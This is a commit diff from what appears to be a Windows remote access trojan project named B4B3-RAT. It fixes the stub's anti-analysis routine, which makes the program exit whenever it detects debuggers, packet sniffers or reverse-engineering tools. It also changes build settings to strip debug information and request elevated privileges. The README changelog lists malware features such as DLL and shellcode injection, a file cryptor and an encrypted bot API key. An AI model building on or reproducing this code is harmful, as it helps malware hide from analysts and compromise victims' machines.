Fix crash

B4B3-RAT/Stub/Manager.cpp

@@ -124,15 +124,8 @@ std::vector<std::string> Manager::split(std::string str, char delim) {
 	std::stringstream ss(str);
 	std::string word;
 	std::vector<std::string> splittened;
-	while (std::getline(ss, word, delim))
-	{
+	while (std::getline(ss, word, delim)) {
 		splittened.push_back(word);
 	}
 	return splittened;
-}
-
-std::string Manager::ToLower(std::string str) {
-	std::string lower = "";
-	std::transform(str.begin(), str.end(), lower.begin(), ::tolower);
-	return lower;
 }

B4B3-RAT/Stub/Protector.cpp

@@ -24,17 +24,15 @@ SOFTWARE.
 
 #include "Protector.h"
 #include "Manager.h"
-#include <winternl.h>
 
 void Protector::AntiProcesses() {
 	HANDLE hSnap;
 	PROCESSENTRY32 pe32;
 	pe32.dwSize = sizeof(PROCESSENTRY32);
 
-	std::vector<std::string> processes =
-	{
+	std::vector<std::string> processes = {
 		"ollydbg.exe",
-		"ProcessHacker.exe",
+		"processhacker.exe",
 		"tcpview.exe",
 		"autoruns.exe",
 		"autorunsc.exe",
@@ -44,37 +42,45 @@ void Protector::AntiProcesses() {
 		"procexp.exe",
 		"idaq.exe",
 		"idaq64.exe",
-		"ImmunityDebugger.exe",
-		"Wireshark.exe",
+		"immunitydebugger.exe",
+		"wireshark.exe",
 		"dumpcap.exe",
-		"HookExplorer.exe",
-		"ImportREC.exe",
-		"PETools.exe",
-		"LordPE.exe",
-		"SysInspector.exe",
+		"hookexplorer.exe",
+		"importrec.exe",
+		"petools.exe",
+		"lordpe.exe",
+		"sysinspector.exe",
 		"proc_analyzer.exe",
-		"sysAnalyzer.exe",
+		"sysanalyzer.exe",
 		"sniff_hit.exe",
 		"windbg.exe",
 		"joeboxcontrol.exe",
-		"joeboxserver.exe"
+		"joeboxserver.exe",
+		"windanr.exe",
+		"q.exe",
+		"dnspy.exe",
+		"idapro.exe",
+		"httpdebugger.exe"
 	};
 
+	size_t size = processes.size();
 	std::string process = "";
 	while (true) {
-		Sleep(3000);
 		hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 		if (hSnap != NULL) {
 			if (Process32First(hSnap, &pe32)) {
 				do {
-					process = Manager::ToLower(pe32.szExeFile);
-					for (size_t i = 0; i < processes.size(); i++) {
+					for (size_t i = 0; i < size; i++) {
+						process = pe32.szExeFile;
+						std::transform(process.begin(), process.end(), process.begin(),
+							[](unsigned char c) { return std::tolower(c); });
 						if (process.find(processes[i]) != std::string::npos) {
 							ExitProcess(0);
 						}
 					}
 				} while (Process32Next(hSnap, &pe32));
 			}
 		}
+		Sleep(3000);
 	}
 }

B4B3-RAT/Stub/Release/Stub.exe.recipe

@@ -1,7 +1,11 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project>
-  <ProjectOutputs>D:\VisualStudio\source\repos\B4B3-RAT\Release\Stub.exe</ProjectOutputs>
-  <ContentFiles></ContentFiles>
-  <SatelliteDlls></SatelliteDlls>
-  <NonRecipeFileRefs></NonRecipeFileRefs>
+  <ProjectOutputs>
+    <ProjectOutput>
+      <FullPath>D:\VisualStudio\B4B3-RAT\Release\Stub.exe</FullPath>
+    </ProjectOutput>
+  </ProjectOutputs>
+  <ContentFiles />
+  <SatelliteDlls />
+  <NonRecipeFileRefs />
 </Project>

B4B3-RAT/Stub/Release/Stub.log

@@ -1,9 +1,7 @@
-  WinMain.cpp
-D:\VisualStudio\source\repos\B4B3-RAT\Stub\WinMain.cpp(112,71): warning C4191: приведение типов: небезопасное преобразование "void (__cdecl *)(void)" в "LPTHREAD_START_ROUTINE"
-           Вызов этой функции через результирующий указатель может вызвать сбой программы
+  ProcessManager.cpp
   Создание кода
-  1 of 1896 functions (<0.1%) were compiled, the rest were copied from previous compilation.
+  0 of 1887 functions ( 0.0%) were compiled, the rest were copied from previous compilation.
     0 functions were new in current compilation
-    18 functions had inline decision re-evaluated but remain unchanged
+    0 functions had inline decision re-evaluated but remain unchanged
   Создание кода завершено
-  Stub.vcxproj -> D:\VisualStudio\source\repos\B4B3-RAT\Release\Stub.exe
+  Stub.vcxproj -> D:\VisualStudio\B4B3-RAT\Release\Stub.exe

B4B3-RAT/Stub/Release/Stub.tlog/Stub.lastbuildstate

@@ -1,2 +1,2 @@
-PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.19041.0:
-Release|Win32|D:\VisualStudio\source\repos\B4B3-RAT\|
+PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.28.29333:TargetPlatformVersion=10.0.18362.0:
+Release|Win32|D:\VisualStudio\B4B3-RAT\|

B4B3-RAT/Stub/Stub.vcxproj

@@ -38,6 +38,7 @@
     <PlatformToolset>v142</PlatformToolset>
     <WholeProgramOptimization>true</WholeProgramOptimization>
     <CharacterSet>MultiByte</CharacterSet>
+    <SpectreMitigation>false</SpectreMitigation>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
     <ConfigurationType>Application</ConfigurationType>
@@ -50,7 +51,8 @@
     <UseDebugLibraries>false</UseDebugLibraries>
     <PlatformToolset>v142</PlatformToolset>
     <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
+    <CharacterSet>MultiByte</CharacterSet>
+    <SpectreMitigation>false</SpectreMitigation>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
   <ImportGroup Label="ExtensionSettings">
@@ -110,7 +112,7 @@
       <SubSystem>Windows</SubSystem>
       <EnableCOMDATFolding>true</EnableCOMDATFolding>
       <OptimizeReferences>true</OptimizeReferences>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
       <UACExecutionLevel>HighestAvailable</UACExecutionLevel>
       <AdditionalDependencies>cryptlib.lib;%(AdditionalDependencies)</AdditionalDependencies>
     </Link>
@@ -138,12 +140,14 @@
       <SDLCheck>true</SDLCheck>
       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
     </ClCompile>
     <Link>
       <SubSystem>Console</SubSystem>
       <EnableCOMDATFolding>true</EnableCOMDATFolding>
       <OptimizeReferences>true</OptimizeReferences>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <UACExecutionLevel>HighestAvailable</UACExecutionLevel>
     </Link>
   </ItemDefinitionGroup>
   <ItemGroup>

README.md

@@ -90,7 +90,7 @@
 - [x] Add process control (inject dll, shellcode and etc.)
 - [x] Add more information about PC 
 - [x] Add Service manager (for deleting, showing and adding your system drivers)
-- [ ] Add Anti-analysis + Anti-debug functions
+- [x] Add Anti-analysis + Anti-debug functions
 
 # [CHANGELOG]
 <details>
@@ -110,7 +110,7 @@ Date       | Time  | Description
 07.11.2020 | 22:16 | Code refactored. Warnings deleted. Added encryption for your botapi with AES256 (To avoid being stolen from hex). Update list of processes (AntiDebug). ![BeforeBotApi](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/Before_BotApi.png) ![AfterBotApi](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/After_BotApi.png)
 08.11.2020 | 20:25 | Added file cryptor. See command list ![1](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/FileCrypt/1.png) ![2](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/FileCrypt/2.png) ![3](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/FileCrypt/3.png) ![4](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/FileCrypt/4.png)
 19.11.2020 | 20:20 | Code refactored. Fixed command "dir del_file". Added commands in File Manager: "dir read" and "dir write" to read and write files (see command list) ![dir_read](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/dir/dir_read.png) ![dir_write](https://github.com/4B4DB4B3/B4DB4B3-RAT/blob/main/Screenshots/dir/dir_write.png)
-
+12.02.2021 | 23:30 | Fix crash in Anti-Analysis & Anti-Debug function
 </details>
 
 ## Service manager parse table: